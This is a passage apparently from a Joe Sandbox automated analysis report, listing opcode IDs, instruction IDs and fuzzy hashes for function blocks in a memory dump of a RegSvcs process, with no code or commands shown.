                                                        • Instruction Fuzzy Hash: BD914571A01216DBEB24EB5CCC40B79BBB2EFD8724F058569ED059B381E736D902CB61
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                        • Instruction ID: 022202346f8f469fad5aa596878c09f9beb1fb8e57cde962f2da63f470dddaaa
                                                        • Opcode Fuzzy Hash: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                        • Instruction Fuzzy Hash: B88182B1A00A169FEB24CF69C940ABEBBF9FB48700F14852EE455E7740E734D951CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction ID: 41f1f04cbb39e53541e452bd5c31426a8e9b7179fed7d8486ac8feabf07ef05e
                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction Fuzzy Hash: ED819172A012059FDF19CF98C898AAEBBF6BF84310F18866DD9169B344D774D911CB44
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                        • Instruction ID: 13c46929b403e44de5d29583776f161ec8fc72c7ed9f5e64699d7dfacb5cf2be
                                                        • Opcode Fuzzy Hash: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                        • Instruction Fuzzy Hash: BB817C71A00609AFDF65CFA9CC80AEEFBBAFB88354F10442DE955A7211D731AD05CB60
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9a58a0bfed002c3cd4ffb21b1f63a3264e3d6a8971f8cb03b1a1c9ba47116aa
                                                        • Instruction ID: 2cc57f6de0ec2f2537262dc7aada4be63025e71d43f855e6d777411e478de2de
                                                        • Opcode Fuzzy Hash: c9a58a0bfed002c3cd4ffb21b1f63a3264e3d6a8971f8cb03b1a1c9ba47116aa
                                                        • Instruction Fuzzy Hash: 2471CE75D04669DBCB26DF58CC90BBEBBB5FF98710F14821AE942AB350D7709801CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                        • Instruction ID: ae05f736f7307935b4b0ec1b72852f0912a00951d49ce346b874a7bf10c98ee9
                                                        • Opcode Fuzzy Hash: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                        • Instruction Fuzzy Hash: A9719F70D01205EFDB20CF5DDD45AAABBF9EB91710B05815EFA00AB658CB71DD80CB59
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                        • Instruction ID: 7d398a5e2002eba43e0ade38e5e4082f78e672cbccf8922da7f179543aede33b
                                                        • Opcode Fuzzy Hash: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                        • Instruction Fuzzy Hash: CD71CF31A046528FD312DF2CC890B2AB7E6FFC5710F0885ADE8958B352DB34D846CB95
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction ID: e403c160b5ae3c305ef3440644f79790940e673171110a7a32f361d189b7b095
                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction Fuzzy Hash: F0715C71A0061AAFDB10DFA9CD84A9EBBBAFF88700F504569E545E7250DB34EE01CF94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                        • Instruction ID: 7d2759da3e417d8551ac45db08c5e6e0f6216bb58469353723f31d81106d6544
                                                        • Opcode Fuzzy Hash: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                        • Instruction Fuzzy Hash: EF71E332241B01AFE732DF18CC94F96BBB6EF40724F14842CE656872A1D779E984CB50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                        • Instruction ID: 0a90b5bd036825e13e66a9285cb6e2fa60ddc04ab32f1ee850d1e03972b69808
                                                        • Opcode Fuzzy Hash: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                        • Instruction Fuzzy Hash: A8818C72A043168BDB24DF9CDDA4B6DB7FABB48320F19822DD901AB381C7749941CB94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                        • Instruction ID: d1462d05d27c0d1d0e35a4a7e85ad7c06b23709f7834d01f782c09be16a939ec
                                                        • Opcode Fuzzy Hash: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                        • Instruction Fuzzy Hash: 3D71F572E0021AABDF16DB94CC81FAEBBB9FB04354F10416DE621A7290D774AA45CB94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                        • Instruction ID: 03b88e38e32c9e88c0b6a7c6908814ce8b4e522a4323962b4b44d0469ccff163
                                                        • Opcode Fuzzy Hash: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                        • Instruction Fuzzy Hash: 7551CF72909612AFD721DEA8CC44E6BBBE9EBC9750F01092DFA40DB250D774ED05C7A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                        • Instruction ID: e068137f2802661ce8219c44c428f8a8c999cc0a4d96abeb1a27d9f528546a23
                                                        • Opcode Fuzzy Hash: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                        • Instruction Fuzzy Hash: F9518A709007059BD731DF9AC884AABFBFDFF94B10F10861ED296976A1C7B0A945CB90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                        • Instruction ID: 21eb06d41f731e57e34b7f86a29dfe2ff2a3019dce811ef52760985fd1c1687d
                                                        • Opcode Fuzzy Hash: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                        • Instruction Fuzzy Hash: 71514971200A059FCB22EFA9CD80EAAB7BEFF54794F40046DE94297360D735EA41CB54
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                        • Instruction ID: f32179fed5c886bff7b1a79377244a582af60b76067951201541e6172ce72e21
                                                        • Opcode Fuzzy Hash: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                        • Instruction Fuzzy Hash: 3D5145716083028FD754DF2AC891A6BBBE6FFC8A14F44492DF589C7350EB34D9068B96
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction ID: 6a00cc6b9300ea75c806c1ccb20a24f0ff47e819058b8682470c586fe9ec3788
                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction Fuzzy Hash: 8451AE71E0021AABDF15DF98C841BFEBBBAAF44354F144169EA01AB340DB34DD45CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                        • Instruction ID: df21c0df117999644209f8f1acd06be9b094b5ddbdd72e65b8bc159bcdad68bf
                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                        • Instruction Fuzzy Hash: 2D51EB31D0021AEFDF11DF94CD98BAEBB79AF00314F514669DA1267290D7329D40CFA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                        • Instruction ID: 5d7023f05a4a96c9456897ae9b764d9fa7ba9be8894af1dfcdca69672efeebc3
                                                        • Opcode Fuzzy Hash: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                        • Instruction Fuzzy Hash: 9541D1707036119BDA29DB2DCD9CB3BBBDEEF91620F048718E9558B384DB34D811C690
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                        • Instruction ID: 7fcfe2220be78bd7fa584ea42673db60a2239e3904e6fd58ad0382af0354f35b
                                                        • Opcode Fuzzy Hash: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                        • Instruction Fuzzy Hash: 78517B7290021ADFCB20EFA9CD909AEBBF9FB48364B908519E546A7304D770AD01CFD0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a05032972cfe6bac4376c1ad44646059b14315ac946a2b2b547c1452be03c9f
                                                        • Instruction ID: 459d79047de12362de35d2fdee46c9573353eccb6deb25bbfc3284115c81f726
                                                        • Opcode Fuzzy Hash: 0a05032972cfe6bac4376c1ad44646059b14315ac946a2b2b547c1452be03c9f
                                                        • Instruction Fuzzy Hash: 604139716443129BCF65EFADDCA0FAA3B6AEB59718F00412CEF029B341D7B19802C795
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                        • Instruction ID: 25731a8af0a6e91cfb89719a6d9c18c50b4068224925179b1d56f8957256abe9
                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                        • Instruction Fuzzy Hash: A941D8716067169FDB25CF98CD88A6AB7EAFF90210B05472DED5287340EB30ED19C794
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
                                                        • Instruction ID: d83bec19bca9aa13012b0bcd80bda2d15b7c7692c3947a70a9ac02d2a8c80319
                                                        • Opcode Fuzzy Hash: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
                                                        • Instruction Fuzzy Hash: 92315576A4012DABCB21DF54DC94BDE7BFAEB98750F1040A9E508A7250CB30DE51CF90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
                                                        • Instruction ID: c2bfe59dba533d21182ae14abbffcdabc98b9b293a333781376faeaef9a9b128
                                                        • Opcode Fuzzy Hash: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
                                                        • Instruction Fuzzy Hash: 0931E432E00215AFDB21DFA9CD40AAEBBF9FF44350F018569E516E7250D3759E008BA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
                                                        • Instruction ID: 1771533ac17e135ad0b2101b4777c00ac6907058b0725253bf676d99adc7484b
                                                        • Opcode Fuzzy Hash: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
                                                        • Instruction Fuzzy Hash: 0D31F471A41202EBDB139FADCC50BAABBFAAF94315F00416DE506EB342DB30DD018B90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
                                                        • Instruction ID: 025d8f037d074657ae46b306b25f0794ec87e2f898655cf1318c2294146f5397
                                                        • Opcode Fuzzy Hash: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
                                                        • Instruction Fuzzy Hash: E831F976A04B22DBCB12DE288C80D6BBBA6AFD4650F03456DFD5697310DB74DC018BD5
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
                                                        • Instruction ID: e1e3c87b75115056d321253340ccafa3bd20a708a3899729c2a5d1e8b2ca9c27
                                                        • Opcode Fuzzy Hash: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
                                                        • Instruction Fuzzy Hash: 3831AFB26097118FE761DF19CC40B2BBBE9FB88700F044A6DE984A7351D770E844CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction ID: 1400c53ce238a1056cab4ee0124ec31983b74f318bca9abbb178aacbac95d32b
                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction Fuzzy Hash: 8C312CB6B00B01AFD761CFA9DE40B67BBF8AB08650F04052DA99AC3751E730E9008B64
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
                                                        • Instruction ID: 4842cbb18445357c1fa97985701e9418a8ada24d8f1bfdf01c1cc0fbc67819ac
                                                        • Opcode Fuzzy Hash: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
                                                        • Instruction Fuzzy Hash: F2318BB16093418FCB11DF1DC95086ABFF1FF89A18F4449AEE4989B351D332D945CB92
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
                                                        • Instruction ID: 4e05626720fd501fe8059d65100ab2abbdc88bdf5e68500c5d90fd9d3ebd3af6
                                                        • Opcode Fuzzy Hash: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
                                                        • Instruction Fuzzy Hash: 3C31D472B012059FD724EFA9CD82B6EBBFAEB84704F008529D545D7255DB30D946CB90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                        • Instruction ID: 02d137a258adfe2932184f44b648cfcfaea614ee8782c4890b7341cee038cf92
                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                        • Instruction Fuzzy Hash: 56210436E4125AAADB10DFB98C01BAFBBB6AF54750F098175AE15E7340E370CD0187A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                        • Instruction ID: 0a82c6eb385a871c417d51834242b035fe52aa7aeba680439fb735dc546217a2
                                                        • Opcode Fuzzy Hash: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                        • Instruction Fuzzy Hash: 563170715002118BD731AF5CCC41B79B7B5EF80314F44C5ADD9459B386DB74D982CB94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction ID: a820a597d640a7f53d6cb0e4240e455a0ac22bc1bc21b112a596527a0edf2762
                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction Fuzzy Hash: 6A213D36A0065AB7CB15ABA98C00ABFBBBBEF40710F40801EFA9587691E734D940C764
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                        • Instruction ID: 37897260943f305677c6f83828d2b4d443e896e605a63fdebbce9cfa9fb86cdf
                                                        • Opcode Fuzzy Hash: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                        • Instruction Fuzzy Hash: 7A31F731A4152C9BDB32DF18CC41FEEB7BAEB15750F0500A5EA45A7290D775DE818FA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                        • Instruction ID: 0d77a83b73194ae77e1b154581709a487d71ff672afdfc93f8201f65804aab50
                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                        • Instruction Fuzzy Hash: 9B217435A00615EFCB55CF58CD80A8EBBF5FF48714F5080A9EE159B241EA71DA45CB60
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                        • Instruction ID: a120a487a8e97dbfda42d51f63ea197fb009b4be16f169c04debec8218dab333
                                                        • Opcode Fuzzy Hash: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                        • Instruction Fuzzy Hash: 8C21C1726087459BCB22CF58CC80B6BB7E5FB88764F008569FD559B741EB30E941CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction ID: 9de63dca01827086adafec7089db10328c568efeaff40e1c01a78b2fec666e48
                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction Fuzzy Hash: 08316B31600645EFD722CB68C984F6AB7B9EF85354F1449A9E952CB394E730EE42CB50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
